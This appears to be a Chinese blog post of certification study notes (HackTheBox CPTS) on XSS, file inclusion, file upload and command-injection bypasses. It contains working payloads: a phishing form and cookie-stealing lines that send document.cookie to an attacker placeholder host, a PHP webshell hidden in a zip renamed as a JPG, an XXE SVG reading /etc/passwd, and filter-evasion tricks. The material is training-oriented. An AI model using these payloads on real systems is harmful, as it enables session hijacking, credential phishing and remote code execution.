HackTheBox - 学院【CPTS】复习3 - XSS、文件包含、文件上传、命令注入

最新推荐文章于 2024-08-07 00:00:21 发布
最新推荐文章于 2024-08-07 00:00:21 发布
阅读量1.2k 收藏
点赞数
分类专栏: HackTheBox 文章标签: xss 文件上传 文件包含 命令注入 HackTheBox
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_54704239/article/details/131372380
版权

XSS

登录表单

document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');x

这里DOM直接插入一个登录表单可以进行钓鱼

通过DOM可以直接移除原有的登录表单

document.getElementById().remove()

远程加载js

<script src="http://OUR_IP/script.js"></script>

会话劫持

在thm的学习当中,我们知道直接通过fetch()或者iframe标签进行http请求有可能会被浏览器的蜜汁安全给拦截,所以我们可以使用img标签的src来发起http请求,因为img请求起来总是像是合法的,它也并不会被浏览器拦截

document.location='http://OUR_IP/index.php?c='+document.cookie;
new Image().src='http://OUR_IP/index.php?c='+document.cookie;

LFI

PHP Wrappers

数据包装器可用于包含外部数据,包括 PHP 代码。但是,只有在 PHP 配置中启用了 allow_url_include 设置时,数据包装器才可用。

  • php://filter
  • data://text/plain,
  • php://input

RFI

可以尝试http、ftp这些协议。如果是Windows,还可以使用UNC路径,它将会尝试使用smb和http

文件上传搭配文件包含

常规打法。通过文件上传传一个图片马,用文件包含直接包含出来从而RCE

还可以通过上传zip压缩包然后使用zip://解压并RCE

M1n9K1n9@htb[/htb]$ echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.jpg shell.php

?file=zip://./uploads/shell.jpg%23shell.php&cmd=id

PHPSession

  • /var/lib/php/sessions/sess_xxxxxxxx
  • C:\Windows\Temp\

phpsession会记录与用户相关的数据,如果文件内容我们可控,那么我们将能造成RCE

服务器日志以及配置文件

这里包含了linux和Windows常见的服务日志和配置文件路径列表

以及SecLists中的burp-parameter-names.txt用于找到可能导致文件包含的参数

文件上传

常见后缀列表

SecLists的web-extensions.txt

白名单绕过

当遇到不安全的白名单限制时

$fileName = basename($_FILES["uploadFile"]["name"]);

if (!preg_match('^.*\.(jpg|jpeg|png|gif)', $fileName)) {
    echo "Only images are allowed";
    die();
}

可以尝试双扩展

反向双扩展

<FilesMatch ".+\.ph(ar|p|tml)">
    SetHandler application/x-httpd-php
</FilesMatch>

这是Web 服务器确定允许 PHP 代码执行哪些文件的方式

这也就意味着只要文件名的"."后能被以上规则匹配,则将会被php执行,那么我们就可以尝试反向双扩展:

.php.jpg

这个案例能被匹配到

Content-Type / MIME Type

文件上传造成XSS

往图片插入js代码,并以Content-Type:text/html的类型上传,这将可能会造成xss

文件上传造成XXE

通过上传恶意svg图片进行XXE

<!DOCTYPE svg [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<svg>&xxe;</svg>

命令注入

${IFS}

bash花括号

  • {ls,-la}

在bash当中,通过这种形式可以执行命令,bash会自动将里面的逗号转换为空格,而这种方式也只有bash才可以

${环境变量}

${变量名:起始下标:长度}

  • ${PATH:0:1} -> /
  • ${LS_COLORS:10:1} -> ;

具体还是根据目标而定

引号绕过

linux和powershell都可以用引号或双引号绕过黑名单

whoam'i'
whoam"i"

而在windows cmd下只能使用双引号

在这里插入图片描述

$@ - ^

在bash下,$@将会被忽略,cmd下^也是如此

反转绕过

$(rev<<<'di')

iex "$('imaohw' -join '')"

如果管道符|被禁用,则可以尝试<<<

Sugobet
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
hackthebox-bankrobber(考点:xss/xsrf/端口转发/缓冲区溢出)
冬萍子癸水
04-18 684
nmap PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.39 ((Win64) OpenSSL/1.1.1b PHP/7.3.4) | http-methods: |_ Supported Methods: HEAD POST |_http-server-header: Apac...
【web安全】xss复习
Vector_seven的博客
09-09 142
(为了区别于css,所以被称为xssxss属于注入型攻击,是注入html/javascript代码;一直在OWASP top10漏洞中;xss属于客户端的安全问题,本身对web服务端的没有太大的危害,是借助网站使得大量用户受到攻击;xss可导致cookie窃取、会话劫持、钓鱼欺骗等各种各样的攻击;浏览器的同源策略:1)同源策略(Same-Origin Policy)是一种安全机制,用于浏览器中隔离不同源(Origin)之间的网页。2)
xss复习总结及ctfshow做题总结xss
m0_74402888的博客
07-15 754
客户端的脚本程序可以通过DOM动态地检查和修改页面内容,它不依赖于提交数据到服务器端,而从客户端获得DOM中的数据在本地执行,如果DOM中的数据没有经过严格确认,就会产生DOM XSS漏洞。存储型XSS:<持久化> 代码是存储在服务器数据库中的,如在个人信息或发表文章等地方,加入代码,如果没有过滤或过滤不严,那么这些代码将储存到服务器中,每当有用户访问该页面的时候都会触发代码执行,这种XSS非常危险,容易造成蠕虫,大量盗窃cookie(虽然还有种DOM型XSS,但是也还是包括在存储型XSS内)。
复习XSS_03_绕过技巧
qq_45300786的博客
05-22 712
xss的绕过技巧 1、大小写绕过 http://target_sys.com/xss/xss04.php?name=<Script>alert(1);</Script> 2、属性多余 http://target_sys.com/xss/xss05.php?name=<script<script>>alert(1);</sc</script>ript> 3、转换标签 http://target_sys.com/xss/xss06.php?
XSS知识点归纳
努力努力再努力
09-10 225
XSS知识点归纳 XSS攻击指通过HTML注入篡改网页,插入恶意的脚本,当用户浏览网页的时候,控制浏览器。 XSS的三种类型 反射型XSS 诱使用户点击一个恶意链接,才能攻击成功,即将用户输入的数据返回给浏览器 反射型XSS也叫做“非持久型XSS” 存储型XSS 将用户输入的数据存储到服务器端,这种XSS有很强的稳定性,所以也叫做持久型XSS。比如我在这篇博客里植入了恶意代码,访问到...
HackTheBox - 学院CPTS复习1 - PASSWORD ATTACKS
M1n9K1n9的博客
06-24 1292
有一个月时间没发文章了,我在6月11号进入htb学院学习CPTS,在扎实的THM基础的加持下,我学的非常顺利,其实大部分内容都相当于复习,而学到的内容只是一些可能不太常见、又或者非常细节的小技巧,这也是非常棒的。虽说大部分内容在整个THM学习周期当中都有学会在,但htb学院仍然具有相当一部分THM可能没有的微妙的小细节,这是值得学习的。截至到目前为止我的CPTS学习进度也已经将要接近尾声,而这也只是才过了11天左右的时间。
HackTheBox - 学院CPTS复习4 - Web Attacks
M1n9K1n9的博客
06-25 886
本模块涵盖三种常见的 Web 漏洞,即 HTTP 动词篡改、IDOR 和 XXE,每个漏洞都可能对公司的系统产生重大影响。我们将介绍如何通过各种方法识别、利用和防止它们中的每一个。
HackTheBox - 学院CPTS复习5 - Linux | Windows 权限提升
M1n9K1n9的博客
07-07 711
在此我依然记录一些细节和以前曾忽略的东西。
extended-cpts:一个库,为WordPress自定义帖子类型和分类法提供扩展功能
02-05
扩展的CPT 扩展CPT是一个库,可为WordPress自定义帖子类型和分类法提供扩展功能。 这使开发人员可以快速构建帖子类型和分类法,而不必一次又一次地编写相同的代码。 扩展CPT可与块编辑器和经典编辑器一起使用。...
CPTS-360
02-12
CPTS-360】课程是一门深入探讨文件系统编程的专业课程,由知名的KC ...这个压缩包文件“CPTS-360-master”很可能包含了课程的源代码、讲义、练习和项目材料,可以帮助学生更深入地实践和探索EXT2文件系统编程的奥秘。
HTML44-cpts_1052_bom模板官网落地页APP主页产品宣传页源码 landing静态页面.zip
04-23
这个压缩包中的HTML44-cpts_1052_bom文件可能是整个模板的核心,包含了HTML结构、CSS样式和JavaScript代码。在使用这个模板时,开发者或设计师可以自定义内容,替换图片、文字,调整颜色和布局,以适应自己的品牌或...
Cpts583-project:此回购用于Cpts 583上的小组最终项目
04-14
CPTS583项目 项目声明: 此回购用于Cpts 583上的小组最终项目 团队信息: 联络人 周晓楠 队员 曾宽裕 张梦晓 陈磊 项目要求: python 3.6 点安装-r requirements.txt 管理员密码: 用户名:admin 密码:112233...
CPTS-350:浙党博士指导的2020年SpringWSU
02-12
CPTS-350:2020年SpringWSU——Zhe Dang博士指导下的确定性有限自动机与线性Diophantine方程》 CPTS-350是一门信息技术领域的高级课程,该课程在2020年春季由Zhe Dang Code教授在华盛顿州立大学(WSU)进行讲授。...
XSS (跨站脚本攻击) 详解
TechEnthusiast的博客
08-07 117
XSS(Cross-Site Scripting)是一种常见的web应用程序漏洞,允许攻击者将恶意脚本注入到其他用户浏览的网页中。当受害者浏览这些被注入恶意脚本的页面时,脚本会在用户的浏览器中执行,可能导致各种安全问题。XSS攻击之所以危险,是因为它能够绕过同源策略(Same-Origin Policy),这是浏览器的一种安全机制,用于限制不同源之间的交互。
大学生电子设计大赛-0-30V 4A数控稳压电源资料.rar
08-12
大学生电子设计大赛-0-30V 4A数控稳压电源资料.rar
基于Springboot和Vue的网上商城系统源码 网上商城系统代码(高分毕设)
08-12
网上商城系统源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug! 系统源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug! 系统源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug!
大学生电子设计大赛-《数字电子技术》 电子教案.rar
08-12
大学生电子设计大赛-《数字电子技术》 电子教案.rar
2023-04-06-项目笔记 - 第二百二十三阶段 - 4.4.2.221全局变量的作用域-221 -2024.08.12
最新发布
08-12
2023-04-06-项目笔记-第二百二十三阶段-课前小分享_小分享1.坚持提交gitee 小分享2.作业中提交代码 小分享3.写代码注意代码风格 4.3.1变量的使用 4.4变量的作用域与生命周期 4.4.1局部变量的作用域 4.4.2全局变量的作用域 4.4.2.1全局变量的作用域_1 4.4.2.221局变量的作用域_221- 2024-08-12
linux如何用c语言代码打开并展示emf文件
06-02
要在Linux中使用C语言代码打开并展示EMF文件,你可以使用X11图形库来创建一个窗口并在其中显示EMF文件内容。以下是一个简单的程序,可以打开并显示EMF文件: ```c #include <stdio.h> #include <stdlib.h> #include <X11/Xlib.h> #include <X11/Xutil.h> #include <libEMF/emf.h> int main(int argc, char **argv) { EMF_HANDLE handle; EMR *record; int i; if (argc < 2) { printf("Usage: %s <filename.emf>\n", argv[0]); return 1; } handle = EMF_LoadFile(argv[1]); if (handle == NULL) { printf("Failed to open file %s\n", argv[1]); return 2; } Display *display = XOpenDisplay(NULL); if (!display) { printf("Failed to open X11 display\n"); return 3; } int screen = DefaultScreen(display); Window root_window = RootWindow(display, screen); Window window = XCreateSimpleWindow(display, root_window, 0, 0, 640, 480, 0, BlackPixel(display, screen), WhitePixel(display, screen)); XSelectInput(display, window, ExposureMask | KeyPressMask); XMapWindow(display, window); GC gc = XCreateGC(display, window, 0, NULL); while (1) { XEvent event; XNextEvent(display, &event); if (event.type == Expose) { for (i = 0; i < EMF_GetNumRecords(handle); i++) { record = EMF_GetRecord(handle, i); // 处理EMF记录,绘制到窗口中 switch (record->iType) { case EMR_HEADER: // 处理EMF文件头 break; case EMR_POLYLINE: { EMRPOLYLINE *polyline = (EMRPOLYLINE *)record; XPoint *points = malloc(polyline->cpts * sizeof(XPoint)); int j; for (j = 0; j < polyline->cpts; j++) { points[j].x = polyline->apts[j].x; points[j].y = -polyline->apts[j].y; // Y坐标需要翻转 } XDrawLines(display, window, gc, points, polyline->cpts, CoordModeOrigin); free(points); break; } // 处理其他EMF记录类型 default: break; } } } else if (event.type == KeyPress) { break; } } XFreeGC(display, gc); XDestroyWindow(display, window); XCloseDisplay(display); EMF_CloseFile(handle); return 0; } ``` 在程序中,我们首先使用`EMF_LoadFile`函数打开EMF文件,并将返回的句柄保存在`handle`变量中。然后,我们使用X11图形库创建一个窗口,并在窗口的Expose事件中处理EMF记录,并将它们绘制到窗口中。在这个例子中,我们只是处理了EMR_POLYLINE记录类型,并将它们绘制成线条,但是你可以根据需要处理其他记录类型并将它们绘制到窗口中。最后,我们在窗口的KeyPress事件中退出程序,并关闭文件和释放资源。 需要注意的是,使用X11图形库需要先安装它,可以使用以下命令在Ubuntu中安装: ```bash sudo apt-get install libx11-dev ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Sugobet

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值